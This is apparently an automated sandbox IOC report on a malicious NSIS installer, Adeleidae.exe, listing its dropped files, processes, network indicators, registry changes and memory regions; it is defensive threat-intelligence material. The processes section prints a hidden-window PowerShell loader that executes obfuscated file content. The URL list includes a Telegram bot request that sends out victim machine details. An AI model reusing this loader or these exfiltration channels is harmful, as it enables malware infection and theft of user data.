IOC Report
Adeleidae.exe

loading gif

Files

File Path
Type
Category
Malicious
Adeleidae.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add
ASCII text, with very long lines (3263), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Damascenere.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zborzuz.44l.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ehu4lz3.5go.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgwboprl.ygv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xi30enhu.mgu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Fornuftens.Ano
data
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\bekrigelsers.tai
data
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\campagnol.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\cellulomonas.irr
data
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\eskimologens.for
data
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\lila.bes
data
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\onomatopoeical.kri
data
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\pantomimer.sek
data
dropped
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\semianimate.pol
dBase IV DBT, block length 2560, next free block index 21, next free block 0, next used block 0
dropped
C:\Windows\Resources\Nebengeschfter.ini
ASCII text, with CRLF line terminators
dropped
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Adeleidae.exe
"C:\Users\user\Desktop\Adeleidae.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://drive.usercontent.google.com/(
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://api.telegram.org
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
https://drive.usercontent.google.com/o
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://contoso.com/Icon
unknown
https://reallyfreegeoip.org/xml/173.254.250.71
188.114.96.3
https://drive.usercontent.google.com/
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
http://smtp.ionos.es
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://github.com/Pester/Pester
unknown
http://crl.mi
unknown
https://drive.google.com/A
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
132.226.8.169
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20a
unknown
http://51.38.247.67:8081/_send_.php?L
unknown
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
https://reallyfreegeoip.org/xml/173.254.250.71$
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://drive.usercontent.google.com/F
unknown
https://reallyfreegeoip.org
unknown
https://apis.google.com
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 31 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.96.3
malicious
smtp.ionos.es
213.165.67.102
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
drive.google.com
142.250.185.78
drive.usercontent.google.com
142.250.186.161
checkip.dyndns.com
132.226.8.169

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
213.165.67.102
smtp.ionos.es
Germany
malicious
188.114.96.3
reallyfreegeoip.org
European Union
malicious
132.226.8.169
checkip.dyndns.com
United States
142.250.185.78
drive.google.com
United States
142.250.186.161
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Elefantridderen\archangelical
Usurpor125
HKEY_CURRENT_USER\studietiden\syrligere
journalistforbunds
HKEY_CURRENT_USER\pennies\Uninstall\tattling
healthguard
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
25771000
trusted library allocation
page read and write
malicious
9251000
direct allocation
page execute and read and write
malicious
7850000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2683A000
trusted library allocation
page read and write
4E4A000
stack
page read and write
47FD000
trusted library allocation
page execute and read and write
9EBA000
heap
page read and write
27EE0000
trusted library allocation
page read and write
2684F000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
471000
unkown
page readonly
27860000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
9E8D000
heap
page read and write
787000
heap
page read and write
C451000
direct allocation
page execute and read and write
29CF000
stack
page read and write
27930000
trusted library allocation
page read and write
5EE9000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
286D5000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27B9A000
heap
page read and write
2F60000
direct allocation
page read and write
4810000
trusted library allocation
page read and write
9B60000
heap
page read and write
28670000
trusted library allocation
page read and write
27C48000
heap
page read and write
26973000
trusted library allocation
page read and write
481A000
trusted library allocation
page execute and read and write
28680000
trusted library allocation
page read and write
285BF000
trusted library allocation
page read and write
9E10000
direct allocation
page read and write
2571E000
stack
page read and write
28670000
trusted library allocation
page read and write
25B95000
trusted library allocation
page read and write
27920000
trusted library allocation
page read and write
7657000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
876D000
heap
page read and write
27B70000
trusted library allocation
page read and write
4CCE000
stack
page read and write
83BF000
stack
page read and write
25746000
trusted library allocation
page read and write
5EE000
stack
page read and write
27EE0000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
86D0000
heap
page read and write
256DC000
stack
page read and write
279F0000
heap
page read and write
26793000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
47D0000
trusted library section
page read and write
286E0000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
8630000
trusted library allocation
page read and write
5874000
trusted library allocation
page read and write
27DF000
stack
page read and write
2A70000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
267F8000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
2DF0000
trusted library section
page read and write
27860000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
253AE000
stack
page read and write
27910000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
9D7E000
stack
page read and write
2A6A000
trusted library allocation
page execute and read and write
3198000
heap
page read and write
27B9D000
heap
page read and write
285B0000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
86D8000
heap
page read and write
25811000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
26808000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
4800000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
77BE000
stack
page read and write
27910000
trusted library allocation
page read and write
9C51000
direct allocation
page execute and read and write
27910000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
630000
heap
page read and write
9C67000
heap
page read and write
73DE000
stack
page read and write
27920000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
400000
unkown
page readonly
8590000
trusted library allocation
page read and write
284EE000
stack
page read and write
27EE0000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
43F000
unkown
page read and write
26A7E000
trusted library allocation
page read and write
285D0000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
2F20000
direct allocation
page read and write
26AB6000
trusted library allocation
page read and write
9C40000
heap
page readonly
9CA0000
direct allocation
page read and write
27B70000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
269F8000
trusted library allocation
page read and write
2EBD000
heap
page read and write
27910000
trusted library allocation
page read and write
9EBA000
heap
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
2F40000
direct allocation
page read and write
A651000
direct allocation
page execute and read and write
42F000
unkown
page read and write
7840000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
2790E000
stack
page read and write
25954000
trusted library allocation
page read and write
2551E000
stack
page read and write
27B6E000
stack
page read and write
27860000
trusted library allocation
page read and write
7B9000
heap
page read and write
27860000
trusted library allocation
page read and write
48CE000
stack
page read and write
285C0000
trusted library allocation
page read and write
5C21000
remote allocation
page execute and read and write
27B70000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
259BE000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
279F1000
heap
page read and write
6EE000
stack
page read and write
28670000
trusted library allocation
page read and write
4ECE000
stack
page read and write
26896000
trusted library allocation
page read and write
78A0000
trusted library allocation
page read and write
25A88000
trusted library allocation
page read and write
285D0000
trusted library allocation
page execute and read and write
7650000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
252AE000
stack
page read and write
86E0000
heap
page read and write
27910000
trusted library allocation
page read and write
86FA000
heap
page read and write
27B70000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
9DC0000
direct allocation
page read and write
27EE0000
trusted library allocation
page read and write
27BE8000
heap
page read and write
285C0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
4E8E000
stack
page read and write
27910000
trusted library allocation
page read and write
269CE000
trusted library allocation
page read and write
252ED000
stack
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2FC0000
direct allocation
page read and write
2390000
heap
page read and write
27EE0000
trusted library allocation
page read and write
9EF6000
heap
page read and write
2A77000
trusted library allocation
page execute and read and write
27870000
trusted library allocation
page read and write
8E21000
remote allocation
page execute and read and write
27860000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
40A000
unkown
page read and write
27B91000
heap
page read and write
77FD000
stack
page read and write
27876000
trusted library allocation
page read and write
25750000
trusted library allocation
page read and write
27911000
trusted library allocation
page read and write
285D0000
trusted library allocation
page read and write
268AF000
trusted library allocation
page read and write
7B6000
heap
page read and write
82C0000
heap
page read and write
27910000
trusted library allocation
page read and write
278CD000
stack
page read and write
25C4D000
trusted library allocation
page read and write
8430000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
9EC0000
heap
page read and write
27B70000
trusted library allocation
page read and write
25956000
trusted library allocation
page read and write
27940000
heap
page read and write
285B0000
trusted library allocation
page read and write
2526E000
stack
page read and write
5EE1000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
2569E000
stack
page read and write
2595E000
trusted library allocation
page read and write
4C38000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
69E000
stack
page read and write
285B0000
trusted library allocation
page read and write
269EC000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
40A000
unkown
page write copy
285C0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
8680000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
2E84000
heap
page read and write
48E0000
heap
page read and write
9F0B000
heap
page read and write
27EE0000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
27EF0000
trusted library allocation
page execute and read and write
285C0000
trusted library allocation
page read and write
2E93000
heap
page read and write
9CB7000
heap
page read and write
285B0000
trusted library allocation
page read and write
25730000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
8405000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
25BC3000
trusted library allocation
page read and write
792B000
stack
page read and write
25B0B000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
26A75000
trusted library allocation
page read and write
4CE0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
9EF6000
heap
page read and write
28670000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
285F0000
trusted library allocation
page execute and read and write
25580000
direct allocation
page read and write
3CF0000
remote allocation
page execute and read and write
27910000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
86F6000
heap
page read and write
27920000
trusted library allocation
page read and write
401000
unkown
page execute read
27EE0000
trusted library allocation
page read and write
5F0000
heap
page read and write
2580D000
trusted library allocation
page read and write
9EF1000
heap
page read and write
27EE0000
trusted library allocation
page read and write
76F0000
heap
page execute and read and write
269FF000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
9DBF000
stack
page read and write
27910000
trusted library allocation
page read and write
2E3A000
heap
page read and write
2E08000
heap
page read and write
758000
heap
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
2A70000
heap
page read and write
9C65000
heap
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
2E79000
heap
page read and write
2C3C000
stack
page read and write
24E00000
direct allocation
page read and write
267FB000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
47F3000
trusted library allocation
page execute and read and write
25760000
heap
page read and write
285B0000
trusted library allocation
page read and write
27920000
trusted library allocation
page read and write
8421000
remote allocation
page execute and read and write
27910000
trusted library allocation
page read and write
253EF000
stack
page read and write
285C0000
trusted library allocation
page read and write
608A000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
BA51000
direct allocation
page execute and read and write
285C0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2E96000
heap
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
279F1000
heap
page read and write
7B0000
trusted library allocation
page read and write
7021000
remote allocation
page execute and read and write
28670000
trusted library allocation
page read and write
861E000
stack
page read and write
24E30000
direct allocation
page read and write
2C78000
stack
page read and write
27920000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
8660000
trusted library allocation
page read and write
257E7000
trusted library allocation
page read and write
47E0000
trusted library allocation
page read and write
862B000
trusted library allocation
page read and write
85DE000
stack
page read and write
25ADE000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
2CF0000
heap
page read and write
285E0000
trusted library allocation
page read and write
27ECE000
stack
page read and write
25190000
heap
page read and write
9F3C000
heap
page read and write
82D0000
trusted library allocation
page execute and read and write
26A92000
trusted library allocation
page read and write
27880000
heap
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
28660000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
8595000
trusted library allocation
page read and write
82F0000
trusted library allocation
page read and write
2856E000
stack
page read and write
5F4B000
trusted library allocation
page read and write
9EB3000
heap
page read and write
257D5000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
9EBA000
heap
page read and write
27860000
trusted library allocation
page read and write
27850000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
2689D000
trusted library allocation
page read and write
A4F000
stack
page read and write
4C8C000
stack
page read and write
285B0000
trusted library allocation
page read and write
71B0000
heap
page read and write
285C0000
trusted library allocation
page read and write
268B6000
trusted library allocation
page read and write
27890000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
28684000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
8885000
heap
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
2564E000
stack
page read and write
27EE0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
3E21000
remote allocation
page execute and read and write
285F0000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
7B0000
heap
page read and write
27910000
trusted library allocation
page read and write
9C67000
heap
page read and write
269F1000
trusted library allocation
page read and write
27920000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2310000
heap
page read and write
28670000
trusted library allocation
page read and write
8784000
heap
page read and write
27860000
trusted library allocation
page read and write
25854000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
882A000
heap
page read and write
2555F000
stack
page read and write
257BD000
trusted library allocation
page read and write
26854000
trusted library allocation
page read and write
2A62000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
254E0000
remote allocation
page read and write
27770000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27814000
trusted library allocation
page read and write
6621000
remote allocation
page execute and read and write
268FE000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
4E0D000
stack
page read and write
96000
stack
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
8851000
heap
page read and write
27B70000
trusted library allocation
page read and write
27934000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
46E000
unkown
page read and write
55DB000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
26AE0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2532E000
stack
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
9E20000
direct allocation
page read and write
28680000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
9FC000
unkown
page read and write
27910000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
750000
heap
page read and write
285B0000
trusted library allocation
page read and write
26A81000
trusted library allocation
page read and write
EC51000
direct allocation
page execute and read and write
268BD000
trusted library allocation
page read and write
27EF0000
trusted library allocation
page read and write
2522F000
stack
page read and write
8910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
9D3F000
unkown
page read and write
285B0000
trusted library allocation
page read and write
2852E000
stack
page read and write
2592D000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
26775000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
28650000
trusted library allocation
page execute and read and write
285C0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
401000
unkown
page execute read
285B0000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
82B4000
stack
page read and write
2689F000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
408000
unkown
page readonly
285B0000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
258F0000
trusted library allocation
page read and write
269DE000
trusted library allocation
page read and write
7870000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
2B70000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
436000
unkown
page read and write
9E30000
direct allocation
page read and write
28670000
trusted library allocation
page read and write
269CC000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
650000
heap
page read and write
285B0000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
7C4000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
25981000
trusted library allocation
page read and write
286D2000
trusted library allocation
page read and write
4D8E000
stack
page read and write
27778000
trusted library allocation
page read and write
2685D000
trusted library allocation
page read and write
27E4E000
stack
page read and write
25821000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
439000
unkown
page read and write
27930000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
2684D000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
777F000
stack
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
4DCE000
stack
page read and write
26ACA000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27B90000
heap
page read and write
2A7B000
trusted library allocation
page execute and read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2F30000
direct allocation
page read and write
94F000
stack
page read and write
27920000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
4D30000
heap
page execute and read and write
28670000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
488E000
stack
page read and write
7880000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
9E4A000
heap
page read and write
58D2000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
620000
heap
page read and write
285C0000
trusted library allocation
page read and write
624000
heap
page read and write
4D40000
heap
page read and write
285C0000
trusted library allocation
page read and write
9E40000
heap
page read and write
285B0000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
25903000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
757B000
heap
page read and write
27910000
trusted library allocation
page read and write
4F42000
trusted library allocation
page read and write
2582D000
trusted library allocation
page read and write
26AA0000
trusted library allocation
page read and write
7890000
trusted library allocation
page read and write
870E000
heap
page read and write
9DD0000
direct allocation
page read and write
27B70000
trusted library allocation
page read and write
25B67000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
9DF0000
direct allocation
page read and write
28670000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
9F9000
unkown
page read and write
2543D000
stack
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
7F7C8000
trusted library allocation
page execute and read and write
27910000
trusted library allocation
page read and write
235E000
stack
page read and write
285B0000
trusted library allocation
page read and write
8440000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
2793A000
trusted library allocation
page read and write
78B0000
trusted library allocation
page read and write
471000
unkown
page readonly
27B70000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
490000
heap
page read and write
285B0000
trusted library allocation
page read and write
27850000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
9C50000
heap
page read and write
58CA000
trusted library allocation
page read and write
27C2A000
heap
page read and write
27920000
trusted library allocation
page read and write
25740000
trusted library allocation
page read and write
27920000
trusted library allocation
page read and write
24E20000
direct allocation
page read and write
27EE0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
4D35000
heap
page execute and read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
2A72000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
257C9000
trusted library allocation
page read and write
2CF6000
heap
page read and write
27920000
trusted library allocation
page read and write
269F3000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2360000
heap
page read and write
26A1D000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
7830000
trusted library allocation
page read and write
2F10000
direct allocation
page read and write
27910000
trusted library allocation
page read and write
285E0000
trusted library allocation
page execute and read and write
82E0000
trusted library allocation
page read and write
9E00000
direct allocation
page read and write
26A2B000
trusted library allocation
page read and write
7810000
trusted library allocation
page execute and read and write
8310000
heap
page read and write
47F4000
trusted library allocation
page read and write
4820000
trusted library allocation
page read and write
269FD000
trusted library allocation
page read and write
55E3000
trusted library allocation
page read and write
269E5000
trusted library allocation
page read and write
4840000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
27EF0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
26AA3000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
8627000
trusted library allocation
page read and write
26A8E000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
25923000
trusted library allocation
page read and write
25360000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
26804000
trusted library allocation
page read and write
78B000
heap
page read and write
285B0000
trusted library allocation
page read and write
86F2000
heap
page read and write
2CE0000
heap
page read and write
